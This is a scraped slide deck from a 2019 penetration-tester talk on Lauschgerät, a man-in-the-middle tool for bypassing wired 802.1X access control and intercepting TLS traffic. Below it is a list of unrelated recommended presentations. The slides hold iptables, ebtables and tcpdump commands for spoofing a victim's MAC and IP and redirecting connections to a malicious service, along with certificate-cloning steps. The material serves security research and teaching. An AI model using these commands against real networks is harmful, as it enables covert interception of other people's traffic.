lauschger t
play

Lauschgert Gets in your victims traffjc and out of yours Adrian - PowerPoint PPT Presentation

May 29, 2023 •479 likes •830 views

November 29, 2019 Adrian Vollmer | Lauschgert SySS GmbH Page 1 Lauschgert Gets in your victims traffjc and out of yours Adrian Vollmer November 29, 2019 @mr_mitm Adrian Vollmer | Lauschgert SySS GmbH Page 2 About me Used to

  1. November 29, 2019 Adrian Vollmer | Lauschgerät SySS GmbH Page 1 Lauschgerät Gets in your victim’s traffjc and out of yours Adrian Vollmer

  2. November 29, 2019 @mr_mitm Adrian Vollmer | Lauschgerät SySS GmbH Page 2 About me ➔ Used to be a cosmologist ➔ Pentester since 2015 at SySS ➔ Specialized on Windows networks ➔ Wrote Seth and presented at Black Hat USA Arsenal, Hacktivity, DACH-Security ➔

  3. November 29, 2019 Adrian Vollmer | Lauschgerät SySS GmbH Page 3 About Lauschgerät ➔ Helps you with all kinds of MitM attacks ➔ In particular bypassing 802.1X network access control and TLS inspection ➔ Written in Python and Bash ➔ Physical (Raspi or similar) or virtual ➔ Manageable via web interface (Flask) ➔ Modular concept ➔ https://github.com/SySS-Research/Lauschgeraet ➔ Focus: Attacks on the client; painless; automated

  6. Before: After: November 29, 2019 Adrian Vollmer | Lauschgerät SySS GmbH Page 6 Setup

  7. Before: After: November 29, 2019 Adrian Vollmer | Lauschgerät SySS GmbH Page 6 Setup

  9. 1. Unplug the network cable 2. Source-NAT Ethernet frames 3. Source-NAT IP packets 4. Redirect specifjc TCP connections 5. Perform TLS inspection 6. ??? 7. Parse and modify HTTP messages November 29, 2019 Adrian Vollmer | Lauschgerät SySS GmbH Page 8 Sailing the Seven SeasLayers

  10. does not work until it’s authenticated the same MAC address November 29, 2019 Adrian Vollmer | Lauschgerät SySS GmbH Page 9 802.1X bypass – Why not just use a hub? ➔ Reminder: (wired) 802.1X is certifjcate-based authentication at layer 2 – ethernet port ➔ Theoretically, a hub should work: let the legitimate client authenticate the port and use ➔ The problem is a race condition: if one ACK is received by the wrong client, it sends a RST ➔ Could disconnect the legitimate client, but port needs to be re-authorized regularly

  11. A Bridge Too Far. Defeating Wired 802.1X with a Transparent Bridge Using Linux (Alva Lease ’Skip’ Duckwall IV) https: //www.defcon.org/images/defcon-19/dc-19-presentations/ Duckwall/DEFCON-19-Duckwall-Bridge-Too-Far.pdf November 29, 2019 Adrian Vollmer | Lauschgerät SySS GmbH Page 10 802.1X bypass – better idea ➔ Create new network name space ➔ Put two interfaces there ( eth1 and eth2 ) ➔ Create network bridge ( br0 ) ➔ Adjust source addresses (SNAT) with iptables and ebtables ➔ Manually fjx ARP table ➔ Inject own traffjc by routing it via an IP address on br0

  12. A Bridge Too Far. Defeating Wired 802.1X with a Transparent Bridge Using Linux (Alva Lease ’Skip’ Duckwall IV) 1 1 https://www.defcon.org/images/defcon-19/dc-19-presentations/ Duckwall/DEFCON-19-Duckwall-Bridge-Too-Far.pdf November 29, 2019 Adrian Vollmer | Lauschgerät SySS GmbH Page 10 802.1X bypass – better idea ➔ Create new network name space ➔ Put two interfaces there ( eth1 and eth2 ) ➔ Create network bridge ( br0 ) ➔ Adjust source addresses (SNAT) with iptables and ebtables ➔ Manually fjx ARP table ➔ Inject own traffjc by routing it via an IP address on br0

  13. Client default-netns lg-netns eth1 Attacker 192.168.1.1/24 203.0.113.2/24 203.0.113.1/24 192.0.2.1/24 lgGateway lgPeer eth0 br0 phys. Interface virt. Interface IP address eth2 virt. Link phys. Link Switch

  15. Standard mandates: EAPoL packets must not traverse a network bridge Solution 1: patch the Linux kernel Solution 2: use something like scapy to forward them manually Solution 3: echo 8 > /sys/class/net/br0/bridge/group_fwd_mask (since kernel 3.2) November 29, 2019 Adrian Vollmer | Lauschgerät SySS GmbH Page 13 802.1X bypass – a caveat

  16. Standard mandates: EAPoL packets must not traverse a network bridge Solution 2: use something like scapy to forward them manually Solution 3: echo 8 > /sys/class/net/br0/bridge/group_fwd_mask (since kernel 3.2) November 29, 2019 Adrian Vollmer | Lauschgerät SySS GmbH Page 13 802.1X bypass – a caveat ➔ Solution 1: patch the Linux kernel

  17. Standard mandates: EAPoL packets must not traverse a network bridge Solution 3: echo 8 > /sys/class/net/br0/bridge/group_fwd_mask (since kernel 3.2) November 29, 2019 Adrian Vollmer | Lauschgerät SySS GmbH Page 13 802.1X bypass – a caveat ➔ Solution 1: patch the Linux kernel ➔ Solution 2: use something like scapy to forward them manually

  18. Standard mandates: EAPoL packets must not traverse a network bridge kernel 3.2 2 ) 2 https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/ linux.git/commit/?id=515853ccecc6987dfb8ed809dd8bf8900286f29e November 29, 2019 Adrian Vollmer | Lauschgerät SySS GmbH Page 13 802.1X bypass – a caveat ➔ Solution 1: patch the Linux kernel ➔ Solution 2: use something like scapy to forward them manually ➔ Solution 3: echo 8 > /sys/class/net/br0/bridge/group_fwd_mask (since

  19. We need the IP and MAC address of the client and the MAC address of the gateway. How can we determine that from just observing traffjc? Sniffjng DHCP responses could work, but sometimes clients use a static IP confjg Instead, see where DNS or Kerberos requests go: tcpdump -i br0 -w "$TCPDUMP_FILE" -c1 \ "udp dst port 53 or tcp dst port 88" 2> /dev/null They’re usually on a different subnet and thus go via the gateway Don’t forget to statically set the ARP entries ... including a fake entry with a bogus gateway November 29, 2019 Adrian Vollmer | Lauschgerät SySS GmbH Page 14 802.1X bypass – the search for the gateway

  20. We need the IP and MAC address of the client and the MAC address of the gateway. How can we determine that from just observing traffjc? tcpdump -i br0 -w "$TCPDUMP_FILE" -c1 \ "udp dst port 53 or tcp dst port 88" 2> /dev/null November 29, 2019 Adrian Vollmer | Lauschgerät SySS GmbH Page 14 802.1X bypass – the search for the gateway ➔ Sniffjng DHCP responses could work, but sometimes clients use a static IP confjg ➔ Instead, see where DNS or Kerberos requests go: ➔ They’re usually on a different subnet and thus go via the gateway ➔ Don’t forget to statically set the ARP entries ➔ ... including a fake entry with a bogus gateway

  21. Because attacker and victim client are using the same IP and MAC, incoming Ephemeral Source Ports: Page 15 SySS GmbH Adrian Vollmer | Lauschgerät November 29, 2019 many Linux kernels: 32768 to 60999 Vista/7/2008/10: 49152 - 65535 (as recommended by IANA) XP/2003: 1025 – 5000 802.1X bypass – injecting traffjc packets can’t be distinguished. -j snat --to-src $CLIENT_MAC ebtables -t nat -A POSTROUTING -s $SWITCH_MAC -o br0 \ -p tcp -j SNAT --to $CLIENT_IP:61000-62000 iptables -t nat -A POSTROUTING -o br0 -s $ATTACKER_NET \ attacker traffjc: Solution: Use iptables to fjx source ports in the range 61000-62000 for ✞ ☎ ✝ ✆

  22. Because attacker and victim client are using the same IP and MAC, incoming Ephemeral Source Ports: Page 15 SySS GmbH Adrian Vollmer | Lauschgerät November 29, 2019 many Linux kernels: 32768 to 60999 Vista/7/2008/10: 49152 - 65535 (as recommended by IANA) XP/2003: 1025 – 5000 802.1X bypass – injecting traffjc packets can’t be distinguished. -j snat --to-src $CLIENT_MAC ebtables -t nat -A POSTROUTING -s $SWITCH_MAC -o br0 \ -p tcp -j SNAT --to $CLIENT_IP:61000-62000 iptables -t nat -A POSTROUTING -o br0 -s $ATTACKER_NET \ attacker traffjc: Solution: Use iptables to fjx source ports in the range 61000-62000 for ✞ ☎ ✝ ✆

  23. Client default-netns lg-netns add ARP entry: 192.0.2.254 → $MAC eth1 Attacker 192.168.1.1/24 203.0.113.2/24 203.0.113.1/24 192.0.2.1/24 lgGateway lgPeer eth0 br0 phys. Interface virt. Interface IP address eth2 virt. Link phys. Link Switch

  24. Injecting: Just add a route via our gateway IP Modifying: Add iptables rule iptables -t nat -A PREROUTING -i br0 \ -p tcp --dport 443 --destination 1.2.3.4 \ -j DNAT --to-destination 203.0.113.1:443 November 29, 2019 Adrian Vollmer | Lauschgerät SySS GmbH Page 17 Injecting and modifying traffjc Example: 1.2.3.4:443 → 203.0.113.1:443 (a malicious service) ✞ ☎ ✝ ✆

  25. November 29, 2019 Adrian Vollmer | Lauschgerät SySS GmbH Page 18 TLS Inspection ➔ Most interesting traffjc is encrypted ➔ Need TLS proxy, e.g. https://github.com/ickerwx/tcpproxy ➔ Desirable features: ➔ Automatically fjnd original destination ➔ Create a new cert which looks identical to the original ➔ Watch clear text traffjc in Wireshark

  26. Goal: Automatically fjnd original destination Easy, if connection was redirected with iptables : Page 19 SySS GmbH Adrian Vollmer | Lauschgerät November 29, 2019 (a, b, c, d, port)) print('Original destination was: %d.%d.%d.%d:%d' % sockaddr_in[:8]) _, port, a, b, c, d = struct.unpack('!HHBBBB', 16) SO_ORIGINAL_DST, sockaddr_in = conn.getsockopt(socket.SOL_IP, SO_ORIGINAL_DST = 80 TLS Inspection – original destination ✞ ☎ ✝ ✆

  27. Goal: Create a certifjcate that looks like the original as much as possible https://github.com/SySS-Research/clone-cert November 29, 2019 Adrian Vollmer | Lauschgerät SySS GmbH Page 20 TLS Inspection – clone cert ➔ Create a new key pair ➔ Parse ASN.1 structure ➔ Replace public key ➔ Modify serial number, issuer and CA key identifjer ➔ (Only the issuer is human readable) ➔ Re-sign key with new private key

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

Object Oriented Programming in C# February 13, 2008 The C# object model 1 Implementing an

Object Oriented Programming in C# February 13, 2008 The C# object model 1 Implementing an

Object Oriented Programming in C# February 13, 2008 The C# object model 1 Implementing an object oriented language 2 1/27 Goals of the C# object system. polymorphism the ability to write code which operates on many typesrealized by

439 views • 30 slides
A General-Purpose Rule Extractor for SCFG-Based Machine Translation Greg Hanneman , Michelle

A General-Purpose Rule Extractor for SCFG-Based Machine Translation Greg Hanneman , Michelle

A General-Purpose Rule Extractor for SCFG-Based Machine Translation Greg Hanneman , Michelle Burroughs , and Alon Lavie Language Technologies Institute Carnegie Mellon University Fifth Workshop on Syntax and Structure in Statistical Translation

312 views • 28 slides
4. Deep Inelastic Scattering and Partons Or: Fundamental Constituents at Last References: [HM 9;

4. Deep Inelastic Scattering and Partons Or: Fundamental Constituents at Last References: [HM 9;

PHYS 6610: Graduate Nuclear and Particle Physics I H. W. Griehammer INS Institute for Nuclear Studies The George Washington University Institute for Nuclear Studies Spring 2018 II. Phenomena 4. Deep Inelastic Scattering and Partons Or:

436 views • 27 slides
N ew D eve l o p m e n t s i n P a r t o n S h owe r s P. S k a n d s ( C E R N ) Goal: solve

N ew D eve l o p m e n t s i n P a r t o n S h owe r s P. S k a n d s ( C E R N ) Goal: solve

N ew D eve l o p m e n t s i n P a r t o n S h owe r s P. S k a n d s ( C E R N ) Goal: solve this (Request to experiments: solve this) Fields Hits Symmetries 0100110 Amplitudes Acceptance Theory Experiment Monte Carlo Feedback Loop

684 views • 35 slides
Introduction to Monte Carlo Event Generators Torbj orn Sj ostrand Lund University 1.

Introduction to Monte Carlo Event Generators Torbj orn Sj ostrand Lund University 1.

CTEQ-MCnet School 2010 Lauterbad, Germany 26 July - 4 August 2010 Introduction to Monte Carlo Event Generators Torbj orn Sj ostrand Lund University 1. (today) Introduction and Overview; Monte Carlo Techniques 2. (today) Matrix

464 views • 42 slides
Characterizing the Strength of Software Obfuscation Against Automated Attacks Sebastian Banescu,

Characterizing the Strength of Software Obfuscation Against Automated Attacks Sebastian Banescu,

Fakultt fr Informatik T echnische Universitt Mnchen Dagstuhl Seminar 17281 Characterizing the Strength of Software Obfuscation Against Automated Attacks Sebastian Banescu, BMW Group Outline 1 Introduction 2 Obfuscation in Theory 3

815 views • 69 slides
your exercise Order of Presentations Team Topic 212 Distributed file systems 209 OpenSSH:

your exercise Order of Presentations Team Topic 212 Distributed file systems 209 OpenSSH:

The iLab Experience a blended learning hands-on course concept you set the focus Create Your Own Lab July 5, 2016 your exercise Order of Presentations Team Topic 212 Distributed file systems 209 OpenSSH: More than a remote shell 207

1.21k views • 118 slides
x86 Virtualization Hardware/Software Techniques Host/Guest Communication Corentin Derbois

x86 Virtualization Hardware/Software Techniques Host/Guest Communication Corentin Derbois

x86 Virtualization Corentin Derbois, Marc Angel Virtualization 101 x86 Virtualization Hardware/Software Techniques Host/Guest Communication Corentin Derbois Marc Angel corentin@lse.epita.fr null@lse.epita.fr http://lse.epita.fr/ July

562 views • 31 slides
Tolera'ng FileSystem Mistakes with EnvyFS Swaminathan Sundararaman Lakshmi N. Bairavasundaram

Tolera'ng FileSystem Mistakes with EnvyFS Swaminathan Sundararaman Lakshmi N. Bairavasundaram

Tolera'ng FileSystem Mistakes with EnvyFS Swaminathan Sundararaman Lakshmi N. Bairavasundaram Andrea C. ArpaciDusseau NetApp, Inc. Remzi H. ArpaciDusseau University of Wisconsin Madison File Systems in Todays World Modern

941 views • 36 slides
Automatic calculation of NLO splitting functions with loops for exclusive parton shower

Automatic calculation of NLO splitting functions with loops for exclusive parton shower

Automatic calculation of NLO splitting functions with loops for exclusive parton shower Monte-Carlo Oleksandr Gituliar oleksandr.gituliar@ifj.edu.pl Institute of Nuclear Physics Polish Academy of Sciences, Cracow, Poland http://www.ifj.edu.pl

760 views • 12 slides
P Part I Overview t I O i C Chapter 2: Operating System Structures 2 O i S S 1 Fall

P Part I Overview t I O i C Chapter 2: Operating System Structures 2 O i S S 1 Fall

P Part I Overview t I O i C Chapter 2: Operating System Structures 2 O i S S 1 Fall 2010 Operating System Services Operating System Services User Interface ( e.g ., command processor shell and GUI Graphical User

748 views • 31 slides
Announcements No class next Tuesday CS Department Research Symposium (10/08, next Tuesday) 1

Announcements No class next Tuesday CS Department Research Symposium (10/08, next Tuesday) 1

Announcements No class next Tuesday CS Department Research Symposium (10/08, next Tuesday) 1 CS6501: T opics in Learning and Game Theory (Fall 2019) Optimal Auction Design for Single-Item Allocation (Part II) Instructor: Haifeng Xu

784 views • 42 slides
Simple near-optimal auctions Posted price auctions Recap Last week: Optimal revenue single

Simple near-optimal auctions Posted price auctions Recap Last week: Optimal revenue single

Algorithmic game theory Ruben Hoeksma December 17, 2018 Simple near-optimal auctions Posted price auctions Recap Last week: Optimal revenue single item auction (Myersons auction) Virtual valuations For any feasible (DSIC, IR)

747 views • 13 slides
Core-Selecting Auction Design for Dynamically Allocating Heterogeneous VMs in Cloud Computing

Core-Selecting Auction Design for Dynamically Allocating Heterogeneous VMs in Cloud Computing

Core-Selecting Auction Design for Dynamically Allocating Heterogeneous VMs in Cloud Computing Haoming Fu , Zongpeng Li , Chuan Wu , Xiaowen Chu University of Calgary The University of Hong Kong Hong Kong Baptist

608 views • 25 slides
Analytics Building Blocks Duen Horng (Polo) Chau Assistant Professor Associate Director, MS

Analytics Building Blocks Duen Horng (Polo) Chau Assistant Professor Associate Director, MS

http://poloclub.gatech.edu/cse6242 CSE6242 / CX4242: Data & Visual Analytics Analytics Building Blocks Duen Horng (Polo) Chau Assistant Professor Associate Director, MS Analytics Georgia Tech Partly based on materials by

546 views • 40 slides
Virtualization Virtualization Memory virtualization Process feels like it has its own

Virtualization Virtualization Memory virtualization Process feels like it has its own

4/25/08 Virtualization Virtualization Memory virtualization Process feels like it has its own address space Created by MMU, configured by OS Storage virtualization Logical view of disks connected to a machine External

441 views • 8 slides
Virtualization. A dream within a dream Type 1 Virtualization Hypervisor run on bare

Virtualization. A dream within a dream Type 1 Virtualization Hypervisor run on bare

Virtualization. A dream within a dream Type 1 Virtualization Hypervisor run on bare metal. Dedicated virtualization machine. Higher performance. Typical for servers. Type 2 Virtualization Hypervisor sits on

571 views • 17 slides
Embedded Virtualization Greg Ungerer greg.ungerer@accelerated.com Embedded Virtualization For

Embedded Virtualization Greg Ungerer greg.ungerer@accelerated.com Embedded Virtualization For

Embedded Virtualization Greg Ungerer greg.ungerer@accelerated.com Embedded Virtualization For development Run on host as testing tool Native development platform On target Fast cheap capable hardware Multiple machine instances

509 views • 7 slides
Language Language Vi Virtua rtualization lization fo for r Heterogeneo Heterogeneous us

Language Language Vi Virtua rtualization lization fo for r Heterogeneo Heterogeneous us

Language Language Vi Virtua rtualization lization fo for r Heterogeneo Heterogeneous us Par Parallel allel Computing Computing Hassan Chafi, Arvind Sujeeth, Zach DeVito, Pat Hanrahan, Kunle Olukotun Stanford University Adriaan

1.11k views • 44 slides
Virtualization Thierry Sans (recap) What is an OS? OS is software between applications and

Virtualization Thierry Sans (recap) What is an OS? OS is software between applications and

Virtualization Thierry Sans (recap) What is an OS? OS is software between applications and hardware Abstracts hardware to makes applications portable Makes finite resources (memory, # CPU cores) appear much larger and fully dedicated to

541 views • 32 slides
Virtualization to Improve Compute Node Performance Brian Kocoloski Jack Lange Department of

Virtualization to Improve Compute Node Performance Brian Kocoloski Jack Lange Department of

Department of Computer Science Better than Native: Using Virtualization to Improve Compute Node Performance Brian Kocoloski Jack Lange Department of Computer Science University of Pittsburgh 6/29/2012 1 Department of Computer Science

420 views • 23 slides
Virtualization Infrastructure at Karlsruhe HEPiX Fall 2007 Volker Buege 1),2) , Ariel Garcia 1) ,

Virtualization Infrastructure at Karlsruhe HEPiX Fall 2007 Volker Buege 1),2) , Ariel Garcia 1) ,

Virtualization Infrastructure at Karlsruhe HEPiX Fall 2007 Volker Buege 1),2) , Ariel Garcia 1) , Marcus Hardt 1) , Fabian Kulla 1) ,Marcel Kunze 1) , Oliver Oberst 1),2) , Gnter Quast 2) , Christophe Saout 2) 1) IWR Forschungzentrum

478 views • 18 slides
Virtualization and Cloud Environments Saurabh Srivastava Department of Computer Sc. & Engg.

Virtualization and Cloud Environments Saurabh Srivastava Department of Computer Sc. & Engg.

Introduction to Virtualization and Cloud Environments Saurabh Srivastava Department of Computer Sc. & Engg. IIT Kanpur At a glance Virtualization Introduction to virtualization Basic Concepts Hypervisors Cloud

432 views • 31 slides
Distribute d Work T e am Numbe r: 11 COVID-19 pandemic is a disruptive event that will

Distribute d Work T e am Numbe r: 11 COVID-19 pandemic is a disruptive event that will

Distribute d Work T e am Numbe r: 11 COVID-19 pandemic is a disruptive event that will accelerate the adoption of emerging practices. There will never be a return to previous normal. Distributed workforces will be the new model for

800 views • 10 slides

More recommend